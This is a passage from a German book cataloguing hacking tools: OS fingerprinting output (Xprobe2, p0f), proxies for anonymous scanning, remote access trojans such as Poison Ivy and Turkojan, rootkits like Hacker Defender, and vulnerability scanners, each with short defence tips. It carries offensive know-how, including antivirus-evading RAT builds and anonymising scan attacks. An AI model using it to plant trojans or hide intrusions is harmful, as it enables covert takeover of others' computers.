[email protected]:~# xprobe2 -p udp:161:open victim.org Xprobe2 v.0.3 Copyright (c) 2002-2005 [email protected], [email protected], [email protected] [+] Target is victim.org [+] Loading modules. [+] Following modules are loaded: [x] [1] ping:icmp_ping – ICMP echo discovery module [x] [2] ping:tcp_ping – TCP-based ping discovery module [x] [3] ping:udp_ping – UDP-based ping discovery module [x] [4] infogather:ttl_calc – TCP and UDP based TTL distance calculation [x] [5] infogather:portscan – TCP and UDP PortScanner [x] [6] fingerprint:icmp_echo – ICMP Echo request fingerprinting module [x] [7] fingerprint:icmp_tstamp – ICMP Timestamp request fingerprinting module [x] [8] fingerprint:icmp_amask – ICMP Address mask request fingerprinting module [x] [9] fingerprint:icmp_port_unreach – ICMP port unreachable fingerprinting module [x] [10] fingerprint:tcp_hshake – TCP Handshake fingerprinting module [x] [11] fingerprint:tcp_rst – TCP RST fingerprinting module [x] [12] fingerprint:smb – SMB fingerprinting module

52

Kapitel 3 – An den Toren rütteln: Portscanner & Co.

[x] [13] fingerprint:snmp



SNMPv2c fingerprinting module

[+] 13 modules registered [+] Initializing scan engine [+] Running scan engine [-] ping:tcp_ping module: no closed/open TCP ports known on victim.org. Module test failed [-] No distance calculation. victim.org appears to be dead or no ports known [+] Host: victim.org is up (Guess probability: 66%) [+] Target: victim.org is alive. Round-Trip Time: 0.01510 sec [+] Selected safe Round-Trip Time value is: 0.03021 sec [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known) [-] fingerprint:smb need either TCP port 139 or 445 to run Recv() error: Connection refused [-] fingerprint:snmp: RecvTimeout() failed! [+] Primary guess: [+] Host victim.org Running OS: "Microsoft Windows 2003 Server Standard Edition" (Guess probability: 100%) [+] Other guesses: [+] Host victim.org Running OS: "Microsoft Windows 2003 Server Enterprise Edition" (Guess probability: 100%) [+] Host victim.org Running OS: "Microsoft Windows XP SP2" (Guess probability: 100%) [+] Host victim.org Running OS: "Microsoft Windows 2000 Workstation" (Guess probability: 100%) [+] Host victim.org Running OS: "Microsoft Windows 2000 Workstation SP1" (Guess probability: 100%) [+] Host victim.org Running OS: "Microsoft Windows 2000 Workstation SP2" (Guess probability: 100%) [+] Host victim.org Running OS: "Microsoft Windows 2000 Workstation SP3" (Guess probability: 100%) [+] Host victim.org Running OS: "Microsoft Windows 2000 Workstation SP4" (Guess probability: 100%) [+] Host victim.org Running OS: "Microsoft Windows 2000 Server" (Guess probability: 100%) [+] Host victim.org Running OS: "Microsoft Windows 2000 Server Service Pack 1" (Guess probability: 100%) [+] Cleaning up scan engine [+] Modules deinitialized [+] Execution completed. [email protected]:~#

Bild 3.5: Xprobe2 ermittelt das Betriebssystem des Remoterechners

3.6 p0f

3.6

53

p0f

Anbieter

http://lcamtuf.coredump.cx/p0f.shtml

Preis

-

Betriebssystem(e) Linux/UNIX, Solaris, FreeBSD, NetBSD, Sprachen OpenBSD, Mac OS X, AIX und Windows

Englisch

Kategorie(n)

Passives Fingerprinting-Tool

GUI

Größe

< 2 MB

Usability



Installation / Kompilation Know-how

Oberfläche Nein / Ja

CMD

x

Schnittstellen



Das Tool p0f dient der passiven Erkennung der im Einsatz befindlichen Betriebssysteme. Hierzu analysiert p0f die Struktur der empfangenen TCP/IP-Pakete des Netzwerkstroms (oder durch mittels tcpdump im Vorfeld gewonnenen Materials) und nimmt auf Grundlage seiner Datenbank eine Zuordnung vor. In unserem Beispiel wird p0f mit folgendem Parameter gestartet: •

-i device – listen on this device

[email protected]:~# p0f -i eth0 p0f – passive os fingerprinting utility, version 2.0.8 (C) M. Zalewski , W. Stearns [email protected] p0f: listening (SYN) on 'eth0', 262 sigs (14 generic, cksum 0F1F5CA2), rule: 'all'. 192.168.2.100:60784 – Linux 2.6 (newer, 2) (up: 2476 hrs) -> 192.168.1.100:3551 (distance 1, link: ethernet/modem) 192.168.1.100:59579 – Linux 2.6 (newer, 3) (up: 148 hrs) -> 81.169.145.136:110 (distance 0, link: ethernet/modem) 192.168.1.55:1073 – Linux 2.6, seldom 2.4 (older, 4) (up: 18 hrs) -> 192.168.1.100:445 (distance 0, link: ethernet/modem) 192.168.1.225:1279 – Windows 2000 SP4, XP SP1+ -> 192.168.1.100:139 (distance 0, link: ethernet/modem) 192.168.1.217:1034 – Windows 2000 SP4, XP SP1+ -> 92.122.212.138:80 (distance 0, link: ethernet/modem) 192.168.1.10:1471 – Windows 2000 SP4, XP SP1+ -> 63.245.209.58:80 (distance 0, link: ethernet/modem) 192.168.1.10:1474 – Windows 2000 SP4, XP SP1+ -> 193.99.144.85:80 (distance 0, link: ethernet/modem) 192.168.1.225:1282 – Windows 2000 SP4, XP SP1+ -> 85.183.249.137:80 (distance 0, link: ethernet/modem) 192.168.1.217:1042 – Windows 2000 SP4, XP SP1+ -> 192.168.1.229:5900 (distance 0, link: ethernet/modem) 192.168.2.100:46922 – Linux 2.6 (newer, 2) (up: 2476 hrs) -> 192.168.1.100:3551 (distance 1, link: ethernet/modem) ^C

54

Kapitel 3 – An den Toren rütteln: Portscanner & Co.

+++ Exiting on signal 2 +++ [+] Average packet ratio: 17.00 per minute. [email protected]:~#

Bild 3.6: p0f bei der Erkennung von im Netzwerk befindlichen Betriebssystemen

In folgendem Beispiel wird p0f mit einem durch tcpdump gewonnenen Logfile des Netzwerkverkehrs konfrontiert: •

-s file – read packets from tcpdump snapshot

[email protected]:~# p0f -s tcpdump_pcap.log p0f – passive os fingerprinting utility, version 2.0.8 (C) M. Zalewski , W. Stearns [email protected] p0f: listening (SYN) on 'tcpdump_pcap.log', 262 sigs (14 generic, cksum 0F1F5CA2), rule: 'all'. 192.168.2.100:60784 – Linux 2.6 (newer, 2) (up: 2476 hrs) -> 192.168.1.100:3551 (distance 1, link: ethernet/modem) 192.168.1.100:59579 – Linux 2.6 (newer, 3) (up: 148 hrs) -> 81.169.145.136:110 (distance 0, link: ethernet/modem) 192.168.1.55:1073 – Linux 2.6, seldom 2.4 (older, 4) (up: 18 hrs) -> 192.168.1.100:445 (distance 0, link: ethernet/modem) 192.168.1.225:1279 – Windows 2000 SP4, XP SP1+ -> 192.168.1.100:139 (distance 0, link: ethernet/modem) 192.168.1.217:1034 – Windows 2000 SP4, XP SP1+ -> 92.122.212.138:80 (distance 0, link: ethernet/modem) [+] End of input file. [email protected]:~#

Bild 3.7: p0f bei der nachträglichen Analyse durch tcpdump gewonnenen Materials

3.7

Abwehr – generelle Tipps

Nach derzeitigem Stand des Wissens sind reine Portscans, z. B. via Nmap, nur schwer abzuwehren. Da das damit verbundene Sicherheitsrisiko minimal ist – wenn wir Standardabwehrmaßnahmen bestehend aus Hardware- oder Desktop-Firewall als vorhanden voraussetzen –, sollte nur intensiven Portscans (im Minutenbereich) Beachtung geschenkt werden, da hier möglicherweise Vorbereitungen für einen gezielten Einbruch getroffen werden. Sehr oft werden auch Portscans durchgeführt, um infizierte Rechner zu identifizieren bzw. zu koordinieren. Nicht unumstritten ist im Übrigen die Legalität12 von Portscans auf fremde Serveranlagen.

12

http://www.sans.org/reading_room/whitepapers/legal/the_ethics_and_legality_of_port_ scanning_71?show=71.php&cat=legal

55

4

Proxy & Socks

Proxy oder Proxyserver sind die Datenverkehrsvermittler für Computernetze; sie klinken sich für gewöhnlich zwischen Client (z. B. Internetbrowser) und Server ein, mit dem Ziel, den Datentransfer zu protokollieren, zu beschleunigen oder zu anonymisieren. Speziell für letzteren Zweck wurden JAP (Java Anon Proxy) und TOR (Tor’s Onion Routing) entwickelt. Sie anonymisieren Webbrowsing, Instant Messaging, IRC, SSH, EMail, P2P und andere Dienste. Wer sich also weitgehend anonym im Netz bewegen möchte, wird um den Einsatz dieser oder ähnlicher Produkte nicht herumkommen. Populäre Proxies laufen auf verschiedenen Ports, darunter: •

Port 80, 8000, 8080, 3128 etc. für das HTTP(S)-Protokoll



Port 81, 8001 und 8081 für militärisch genutzte Proxies



Port 1080 für SOCKS-Server



Port 23 für Telnet-Wingate-Server und



Port 21 für FTP-Wingate-Server

Eine gute Vorstellung über anonymisierende Proxies und entsprechende Proxylisten findet man auf www.proxylisten.de. Alternativ ist http://proxy4free.com/index.html eine gute Adresse. Im Gegensatz zu den Internetbrowsern sind aber viele Programme, z. B. Scanner, nicht direkt in der Lage, den Datenverkehr ins Internet über einen anonymisierenden Proxyserver abzuwickeln. Dafür gibt es spezielle Programme, mit denen Portoder Security-Scanner in die Lage versetzt werden, über Socks-Proxies mit den Zielrechnern Kontakt aufzunehmen. Da Socks-Proxies fast alle anonym arbeiten, ist das Risiko, bei einer Scanattacke direkt zur Verantwortung gezogen zu werden, sehr gering. Nach einem ähnlichen Prinzip arbeiten im Prinzip kriminelle Hacker, wenn sie für ihre Aktivitäten wie DDoS-Attacken im Vorfeld aufgebaute Bot-Netze oder Zombierechner einsetzen, die ihnen denselben Anonymisierungsschutz bieten wie externe Proxies. Bevor man Proxies nutzt, braucht man natürlich die Connectdaten: •

IP-Adresse des Proxy



Proxytyp wie HTTP(S), Socks4, Socks5



Port, auf dem der Proxy arbeitet



Gegebenenfalls die Login-Passwort-Kombination



Dafür wiederum gibt es – tagesaktuell – bestimmte Listen mit verfügbaren Proxies, z. B. unter www.proxylisten.de.

56

Kapitel 4 – Proxy & Socks

Bild 4.1: Aktive Proxies finden mit proxy-listen.de

4.1

FreeCap

Anbieter

www.freecap.ru/eng

Preis

Betriebssystem(e)

Windows

Sprachen

Englisch

Kategorie(n)

Socks-Proxy

Oberfläche

GUI

Größe

< 2 MB

Usability



Installation

Nein Know-how

x

CMD

Schnittstellen 

Im Prinzip ein gut nutzbares Programm, wenn man einige wichtige Schritte beherzigt. Der wichtigste ist das Finden eines funktionierenden Proxyservers, den man für seine Zwecke nutzen möchte. Im zweiten Schritt muss man die Anwendung, die man anonym nutzen möchte, in FreeCap konfigurieren, d. h. die Proxydaten entsprechend übernehmen. Theoretisch kann man den erzielbaren Anonymitätsgrad auch durch eine Proxykette steigern, wofür FreeCap eine entsprechende Option bereithält.

4.2 Proxy Finder

57

Bild 4.2: Proxykonfiguration für jedes Programm

4.2

Proxy Finder

Anbieter

www.proxy-tool.com

Preis

Betriebssystem(e)

Windows XP

Sprachen

Englisch

Kategorie(n)

Proxy Tools

Oberfläche

GUI

Größe

< 2 MB

Usability



Installation

Nein Know-how

Ab 29 $ x

CMD

Schnittstellen 

Die Alternative, wenn man sich nicht auf vorgefertigte Proxylisten verlassen will, besteht darin, sie sich selbst zu generieren. Voraussetzung dafür ist ein Tool wie der Proxy-Finder, der das Internet auf freie Proxies scannt. Der Suchbereich ist frei wählbar, ebenso die Ports wie 1080, 8080 etc. Die Portliste kann anschließend im ASCII-Format exportiert werden.

58

Kapitel 4 – Proxy & Socks

Bild 4.3: Proxy Finder: schon nach 30 Sekunden Tausende von Treffern

4.3

Abwehr – generelle Tipps

Proxy-Tools sind per se keine Angriffsinstrumente, aber sie können u. a. benutzt werden, um kriminelle Aktivitäten zu verschleiern. Auf Bürorechnern im Firmennetzwerk haben sie allerdings nichts zu suchen.

59

5

Remote Access Tools (RAT) – Anleitung für Zombie-Macher

Kurz gesagt ist ein Zombie ein Rechner ohne eigene Seele oder etwas weniger poetisch ausgedrückt: ein Rechner, der nicht mehr vollständig von seinem Anwender, sondern von außerhalb kontrolliert und gesteuert wird. Von solchen Rechnern können Daten (Logins, Passwörter, PINs, TANs) transferiert, aber auch DDoS-Attacken gestartet werden – bei minimalen Risiken für den Täter, da er nicht selbst an der Tastatur des TatPCs sitzt. Die hier vorgestellten RATs sind die Luxusausführung und eignen sich speziell für individuelle Aufgaben, z. B. dem Ausspionieren von privaten oder Firmengeheimnissen, während die Wald-und-Wiesen-RATs meistens als Trojaner auf dem PC des ahnungslosen Users landen, z. B. beim Besuchen präparierter Webseiten oder beim Öffnen infizierter Mails. Natürlich kann man diese Tools auch völlig legal einsetzen (wie die Entwickler blauäugig versichern), um seinen eigenen PC aus der Ferne zu steuern. Ähnlich klingende Bezeichnungen sind: Remote Administration Tool oder (eindeutiger) Remote Access Trojan. Gegenüber klassischen Fernwartungstools haben RATs eine differenzierte Tarnfunktion, d. h., sie verstecken sich, ihre Prozesse und Treiber häufig mit Rootkit-Technologie vor den Augen der ahnungslosen RAT-Nutzer. Fast alle RATS bestehen aus zwei Teilen: einem Client, mit dem der Angreifer seine Angriffsziele spezifiziert (Fernsteuerung, Datenübertragung, Keylogger etc.), und der damit erstellten Serverkomponente, die dem Opfer (Victim oder kurz auch »vic« genannt) untergeschoben wird. Nach seiner Installation »lauscht« der RAT-Server auf einem vorbestimmten Port und wartet auf Anweisungen. Die frühesten und in der Szene auch berühmt gewordenen RATs waren Back Orifice (BO2K) und SubSeven (auch Backdoor-G oder kurz Sub7 genannt). Zwar findet man diese Tools noch ab und zu im Netz, in der Szene setzt man allerdings auf leistungsfähigere Tools, die über eine bessere Tarnfunktionalität verfügen und auch hinter dem Rücken von Firewalls und Virenscannern arbeiten können.

5.1

Atelier Web Remote Commander

Anbieter

www.atelierweb.com

Preis

Trial, ab 96,95 $

Betriebssystem(e) Win XP, Win 2000, Win2003, Win NT, Win Vista, Win 7

Sprachen

Englisch

Kategorie(n)

Remote Administration

Oberfläche GUI

Größe

< 5 MB

Ja

Usability



Installation /

Know-how

x

Schnittstellen 

CMD

60

Kapitel 5 – Remote Access Tools (RAT) – Anleitung für Zombie-Macher

Der Remote Commander ist im Gegensatz zu den anderen hier vorgestellten Werkzeugen ein offizielles Managementtool zur Überwachung von Remote-PCs. Größter Vorteil: Es muss auf dem zu überwachenden PC nicht installiert werden, es werden keine Treiber und keine zu installierenden Programme auf dem Remote-PC benötigt; selbst eine dort installierte Desktop-Firewall kann den Fernzugriff blockieren. Einzige Voraussetzung: Auf dem »Opfer-PC« muss das Microsoft Network samt Drucker- und Dateifreigabe installiert sein und der Remote Admin braucht für den Zugriff ein Benutzerkonto mit administrativen Rechten.

Bild 5.1: Auf dem Remote-PC können beliebige Manipulationen vorgenommen werden

5.2

Poison Ivy

Anbieter

www.poisonivy-rat.com

Preis

-

Betriebssystem(e) Win XP, Win 2000, Win 2003, Win Sprachen NT

Englisch

Kategorie(n)

RAT

GUI

Größe

< 1 MB

Usability



Oberfläche Installation Know-how

Nein

Schnittstellen 

x CMD

5.3 Turkojan

61

Sehr einfach einzurichtendes Servermodul (für Zielrechner bzw. Victim) inklusive Manual mit einer Vielzahl von Fernsteuerungsmöglichkeiten: File Manager, Registry Editor, Process Manager, Service Manager, Window Manager, Sniffer (zum Abhören aller Verbindungen des Zielrechners nach außen), Key Logger, Screen Shooter etc. Auf Wunsch liefert der Programmautor auch Spezialanpassungen: »A custom version, not detected by any anti-virus products is available for sale.« Im Übrigen ist die komplette Verbindung zum RAT verschlüsselt und passwortgeschützt, sodass kein anderer den Zombierechner nutzen kann.

Bild 5.2: Komfortable All-in-one-Lösung

5.3

Turkojan

Anbieter

www.turkojan.com

Preis

-

Betriebssystem(e)

Win XP, Win 2000, Win 2003, Win NT, Win Vista, Win 7

Sprachen

Deutsch, Englisch, Türkisch

Kategorie(n)

RAT

Oberfläche

GUI

Größe

< 2 MB Installation

Usability



Know-how

Nein

x CMD

Schnittstellen 

Turkojan, das Produkt einer türkischen Hackerschmiede, präsentiert sich multilingual und mit vielen Features, jetzt auch für Windows 7. Der Funktionsumfang ist beträchtlich; im Netz existieren viele Videos, die anschaulich zeigen, wie man sich das Server-

62

Kapitel 5 – Remote Access Tools (RAT) – Anleitung für Zombie-Macher

modul (für den Opfer-PC) zusammenklickt. Es gibt auch eine Private Edition, die gegen die meisten Antivirenprogramme gehärtet ist.

Bild 5.3: Die türkische Variante: derzeit eines der leistungsfähigsten RATs

5.4

Optix Pro

Anbieter

www.evileyesoftware.com

Preis

-

Betriebssystem(e)

Win XP, Win 2000, Win 2003, Win NT

Sprachen

Deutsch, Englisch, Französisch Griech., Italienisch, Arabisch

Kategorie(n)

RAT

Oberfläche

GUI

Größe

< 1 MB

Usability



Installation

x

CMD

Nein Schnittstellen Know-how



Multilinguales, mit vielen Features (wie Firewall-, AV-Deaktivierung, CGI-Logger etc.) ausgestattetes Remote Administration Tool. Laut den Entwicklern ist es in der Lage, 73 AV-Tools sowie 37 Personal-Firewalls auszuschalten.

5.5 Abwehr – generelle Tipps

63

Bild 5.4: Komfortabel zu bedienendes Builder-Modul

Auf Wunsch kann das Servermodul noch mit UPX verschlüsselt werden.

5.5

Abwehr – generelle Tipps

Abgesehen von der kommerziellen Variante von Web Atelier müssen die meisten RATs auf dem Ziel-PC installiert werden, ohne dass der Benutzer davon etwas ahnt, sei es als Drive-by-Download oder als ausführbarer Mailanhang. Genau hier setzt die Verteidigungsstrategie an. Im Grunde sind Realtime-Scanner und Verhaltensblocker, die zum Toolumfang der gängigen AV-Programme gehören oder auch als Standalone-Lösungen angeboten werden, Pflicht. Von der Fachpresse sehr gut bewertet wurden u. a. die Behavior Blocker bzw. HIPS (Host-based Intrusion and Prevention System): •

Online Armour (Shareware: www.tallemu.com)



ProSecurity (Shareware: www.proactive-hips.com13)



AntiHook 3 (Shareware: www.infoprocess.com.au)

Im Gegensatz zu konventionellen, signaturbasierten AV-Scanner registrieren diese Schutzprogramme Verhaltensauffälligkeiten im System, Keylogger werden ebenso geblockt wie Remote-Verbindungen nach außen.

13

Derzeit ist die Seite nicht zu erreichen bzw. wird umgeleitet auf eine »under construction«. Deshalb wohl nur mit Vorsicht zu genießen.

65

6

Rootkits – Malware stealthen

An sich sind Rootkits ein alter Hut; in der UNIX-Welt existieren sie seit Beginn der 90er-Jahre. Damals wurden sie von Hackern als eine Art Hintertürprogramm eingesetzt, um nicht nur den Hack zu tarnen, sondern um sich auch in Zukunft auf dem gekaperten System mit den Rechten des Systemadminstrators root unbemerkt bewegen zu können. Also mit einfachen Worten: Ein »Wurzelbaukasten« ist eine raffinierte Tarntechnik, mit der ein Angreifer einen fremden PC übernehmen und steuern kann, ohne dass diese Aktivitäten vom User bemerkt würden. Diese Tarntechnik eignet sich besonders gut in Kombination mit RATs und Keyloggern, weswegen eine Grenzziehung zwischen Rootkits und Trojanern in der Praxis nicht immer möglich ist. Nebenbei bemerkt lassen sich mit Rootkits natürlich auch andere Schädlinge tarnen, z. B. Browser-Hijacker oder Adware. Rootkits lassen sich anhand ihrer Angriffspunkte grob in zwei Gruppen unterteilen: •

Userland-Rootkits



Kernel-Rootkits (LKM, KMem)

Die Zugriffssteuerung von Betriebssystemen, die auf der x86-Prozessorfamilie von Intel aufsetzen (z. B. Windows und Linux), setzen zur Zugriffssteuerung auf das Prinzip der Ringe, wobei in Ring 0 der gesamte Kernelcode von Windows residiert und Ring 3 (die Ringe 1 und 2 werden nicht benutzt) für Anwenderprogramme (z. B. Word, Excel, Internet Explorer etc.) reserviert ist. Programmcode, der im Ring 0 oder der Kernelebene ausgeführt wird, verfügt über höhere Privilegien als derjenige, der im Userland (Ring 3) operiert. Zwischen Ring 0 und Ring 3 existieren Schnittstellen, die von der WinAPI realisiert werden und aus den Bibliotheken Advapi.dll, Gui32.dll, Kernel32.dll und Win32.dll bestehen. Da kein Userland-Programm direkt mit dem Kernel kommunizieren kann, werden alle Kernelaufrufe über die WinAPI abgewickelt. Und genau hier ist der Angriffspunkt der Userland-Rootkits. Stark vereinfacht gesagt, machen diese nichts anderes, als ihren Programmcode in Anwenderprogramme zu injizieren, wo sie dann z. B. über die User.dll in den Kernel geladen werden. In der Folge kontrollieren diese Rootkits dann die Kommunikation zwischen Kernel und Userland, d. h. jeder Aufruf des Taskmanagers, des Dateiexplorers oder anderer Programme wird entsprechend gefiltert mit dem Ergebnis, dass Prozesse unsichtbar gemacht, Trojanerports freigegeben, oder die Anwesenheit von weiterer Malware auf dem Rechner verschleiert wird. »Nackte« Rootkits ohne Zusatzfunktionalität sind streng betrachtet noch keine Malware; kritisch wird es erst, wenn mit ihrer Stealth-Technologie anderer schädlicher Code (von Würmern, Trojanern, Viren, RATs etc.) vor dem Zugriff durch Viren-/Malware-Scanner versteckt wird.

66

Kapitel 6 – Rootkits – Malware stealthen

Mehr Ressourcen zum Thema – vorzugsweise für den Windows-Bereich (Rootkits, Antirootkits, Sourcecodes, Dokus etc.) – findet man unter: www.rootkit.com.

Bild 6.1: Wirkungsweise von Windows-Rootkits

6.1

Oddysee_Rootkit

Anbieter

http://98.15.254.95/RootKits

Preis

-

Betriebssystem(e) Win 2000, Win 2003, Win XP

Sprachen

Englisch

Kategorie(n)

Rootkit

Oberfläche

GUI

Größe

< 20 KB

Usability



Installation

CMD -

Schnittstellen Know-how



Ein sehr schlankes Standalone-Rootkit mit klassischer Funktionalität. Nach dem erstmaligen Programmaufruf wird ein Treiber gestartet, der sich – unsichtbar – in der Registry verankert und jedes Programm, jede Datei, jeden Registryeintrag verbirgt, der mit einem doppelten Unterstrich anfängt. Mit diesem Programm lässt sich so gut wie jede zusätzliche Malware stealthen. Der folgende Screenshot der Registry konnte nur gemacht werden, nachdem das Rootkit mit IceSword manuell deaktiviert wurde.

6.2 Hacker_Defender

67

Bild 6.2: Rootkit, das bei jedem Neustart als Service gestartet wird

6.2

Hacker_Defender

Anbieter

www.rootkit.com

Preis

Betriebssystem(e)

Win 2000, Win 2003, Win XP

Sprachen

Englisch

Kategorie(n)

Rootkit

Oberfläche

GUI

Größe

< 300 KB

Usability



Installation

CMD x

Schnittstellen Know-how



Der Klassiker und eines der am weitesten verbreiteten Rootkits. Er wird mit .ini-Files konfiguriert: •

[Hidden Table]



[Hidden Processes]



[Root Processes]



[Hidden Services]



[Hidden RegKeys]



[Hidden RegValues]



[Startup Run]



[Free Space]



[Hidden Ports] and [Settings]

Bei der Installation wird gleichzeitig ein Backdoor installiert, das einem Angreifer, der sich mit dem richtigen Passwort ausgewiesen hat, eine getarnte Backdoor-Shell einrichtet.

68

Kapitel 6 – Rootkits – Malware stealthen

Bild 6.3: ZoneAlarm unterbindet eine Infektion

6.3

Abwehr – generelle Tipps

Grundsätzlich stellen Rootkits eine der größten Bedrohungen für die Integrität von Rechnern und Netzen dar, da vorhandene Sicherheitsmechanismen wie AV-Programme und Desktop-Firewalls einfach unterlaufen werden. Neueste Rootkits wie Rustock 2010 oder Abkömmlinge der TDL- oder TDSS-Familie sind selbst mit spezialisierten AntiRootkitprogrammen nur schwer zu bekämpfen. Erschwerend kommt hinzu, dass von ca. zwei Dutzend Antirootkits nur ein Drittel für die neueren Windowsversionen Vista und Win 7 geeignet sind; für die 64-Bit-Versionen sind es noch viel weniger (vgl. http://www.antirootkit.com/news.htm) Bei einem Verdacht sollten grundsätzlich mehrere Tools parallel angewendet werden – erstens solche mit automatischer Erkennungsfunktion wie der Blacklight Rootkit Eliminator von F-Secure, zweitens spezielle, aber profunde Systemkenntnisse voraussetzende Werkzeuge wie der Deep System Explorer von DiamondCs oder der Rootkit Unhooker (www.antirootkit.com). Eine weitere Möglichkeit ergibt sich durch einen Datei-Scan. Zu diesem Zweck wird das gesamte Dateisystem einmal unter dem laufenden Betriebssystem und einmal extern (Start von CD oder USB-Stick) gescannt, z. B. mit dem Advanced Checksum Verifier (www.irnis.net) und dann werden die Abweichungen analysiert. So fallen durch diese Methode modifizierte Systemdateien eher auf.

69

7

Security-/VulnerabilityScanner

Im Gegensatz zu den klassischen Portscannern verfügen Security Scanner wie Nessus oder GFI LANguard über weitergehende, datenbankgestützte Möglichkeiten und eine offene, erweiterbare Architektur, um ein Zielsystem nach bekannten sowie brandneuen Schwachstellen zu scannen: •

Dienste



Freigaben



Passwörter / Passwortrichtlinien



Offene Ports



Fehlende Patches in Betriebssystemen sowie installierten Diensten und Programmen

Anhand des Auswertungsprotokolls können Netzwerk- und Systemadministrator nun gezielt die aufgezeigten Sicherheitslücken stopfen. Prinzipiell können Zielsysteme nichtdestruktiv auditiert werden (was die Systemstabilität des Zielsystems während des Testens garantiert) oder der Scanner provoziert gezielt Sicherheitslücken, stößt also gewissermaßen in die Weichteile vor, um sozusagen am lebenden System die real vorhandenen Abwehrmöglichkeiten zu testen. Auch wenn für die meisten Hacker, mindestens aber für Script-Kiddies, solche Werkzeuge überdimensioniert sind oder ein solides Fachwissen voraussetzen, sind die praktischen Gefahren, die von SecurityScannern ausgehen, dennoch nicht zu vernachlässigen.

7.1

X-NetStat Professional

Anbieter

www.freshsoftware.com

Preis

Trial, ab 29,95 $ Single License

Betriebssystem(e)

Win95, Win98, WinME, Win2000, WinXP, Win2003, Win NT 4.0, Win 7

Sprachen

Englisch

Kategorie(n)

Security Scanner

Oberfläche

Größe

< 2 MB

Ja

Usability



Installation

Know-how

GUI

Schnittstellen

x

CMD

WinPCap



Mit X-NetStat verfügt der Benutzer einerseits über mehr Komfort als mit dem windowseigenen Kommandozeilentool Netstat.exe und andererseits über weit mehr Möglichkeiten, sein Netzwerk zu kontrollieren. Auf einen Blick erkennt er, auf welchen Ports

70

Kapitel 7 – Security-/Vulnerability-Scanner

kommuniziert wird, mit wem der eigene PC verbunden ist und er sieht andere Rechner im Netz, die Art des Zugriffs, die Remoteadressen sowie Anzahl und Inhalt (via Sniffer) der gesendeten und empfangenen Datenpakete. Zusätzlich lassen sich gezielt Verbindungen global oder mit selbst erstellten Regeln blockieren. In den Händen eines versierten Verteidigers ist es weniger ein Angriffswerkzeug als ein Analysetool.

Bild 7.1: Alle Netzwerkinformationen im Griff mit X-NetStat

Wenn es beispielsweise einem Angreifer gelingen sollte, seine Daten unbemerkt via DLLInjection in ein anderes Programm durch die Firewall zu schleusen, kann der Verteidiger den geloggten Datenverkehr mit X-NetStat analysieren und die Spuren zurückverfolgen. Weiterhin können gezielt diese Verbindungen so lange blockiert werden, bis weitere Abwehrmaßnahmen greifen.

7.2

GFI LANguard N.S.S.

Anbieter

www.gfisoftware.de

Preis

Freeware Version, ab 320 € (10 IP-Adressen)

Betriebssystem(e)

Windows 2000, Win XP, Win 2003

Sprachen

Deutsch, Englisch, Italienisch

Kategorie(n)

Security-/Vulnerability-Scanner

Oberfläche

Größe

< 20 MB

Ja

Usability



Installation

Know-how

GUI

Schnittstellen 

x CMD

7.3 Nessus

71

Der »Mercedes« unter den Security-Scannern – auch vom Preis – mit ausgezeichnetem Handling, durchdachter Benutzeroberfläche, integriertem Patch-Agent, Script-Debugger und Status-Monitor. Sinnvoll ist die Anwendung dieses Werkzeugs vor allem bei Sicherheits-Audits, Penetrationstests sowie generell bei der Überprüfung von Schwachstellen in Firmennetzen. Für Hacker ist das Werkzeug zwar auch nützlich, im Endeffekt aber deutlich überdimensioniert.

Bild 7.2: Schwachstellenanalyse mit GFI LANguard

7.3

Nessus

Anbieter / Entwickler

www.nessus.org

Preis

Betriebssystem(e)

Linux/UNIX, FreeBSD, Sprachen Solaris, Mac OS X, Windows

Kategorie(n)

Netzwerkscanner / Vulnerability-Scanner

Oberfläche

Größe

< 120 MB

Nein / Ja

Usability



Installation / Kompilation

Know-how

kommerziell: $1,200 pro Jahr Englisch GUI

Schnittstellen

x

CMD x

Amap, Nmap



Nessus ist ein mächtiger Vulnerability-Scanner für mittlerweile zahlreiche Plattformen mit derzeit etwa 35.000 unterschiedlichen Plugins. Das Nessus-Paket basiert grundsätz-

72

Kapitel 7 – Security-/Vulnerability-Scanner

lich auf dem Client/Server-Prinzip: Der Serverdienst läuft auf einem Rechner, auf dem sich entweder ein lokaler oder ein entfernter Client verbinden kann. GUI-Clients sind für viele Plattformen verfügbar, zudem lässt sich Nessus über einen Web-Browser steuern. Nach Beginn der Sitzung besteht die Möglichkeit, eine Vielzahl an Parametern zu definieren, etwa Ziele, Abhängigkeiten, Scanner und Plugins. Die Plugins, die regelmäßig erweitert und vom Hersteller heruntergeladen werden können, ermöglichen die Aufdeckung diverser Sicherheitslücken der zu scannenden Hosts. Nessus speichert die Ergebnisse in einer Datenbank, ein Export in XML (.nessus), HTML und NBE (CVS) ist möglich.

Bild 7.3: Der NessusServer-Manager unter Windows

7.4 Open Vulnerability Assessment System / OpenVAS

73

Bild 7.4: Nessus-Report als HTML-Datei

7.4

Open Vulnerability Assessment System / OpenVAS

Anbieter / Entwickler

www.openvas.org

Preis

-

Betriebssystem(e)

Linux, FreeBSD

Sprachen

Englisch

Kategorie(n)

Netzwerkscanner / Vulnerability-Scanner

Oberfläche

Größe

< 120 MB

Nein / Ja

Usability



Installation / Kompilation

Know-how

GUI

Schnittstellen

x

CMD x

Amap, Nmap, Portbunny, zahlreiche NASLSkripte, verinice



OpenVAS ist ein freier Vulnerability-Scanner, der sich neben klassischen Verwundbarkeitsanalysen – einem holistischem Ansatz folgend – dem Schwachstellen-Management widmet. So bietet OpenVAS nicht nur eine umfassende Sammlung von Werkzeugen für die Sicherheitsanalyse in Netzwerken, sondern integriert zusätzlich eine Vielzahl von weiteren Sicherheitsanwendungen. Neben der Verzahnung mit dem ISMS-Tool verinice ist OpenVAS durch die Funktion »Local Access Credentials« in der Lage, auch Schwachstellen aus der Innensicht eines Scanziels zu erkunden. Dazu greift OpenVAS

74

Kapitel 7 – Security-/Vulnerability-Scanner

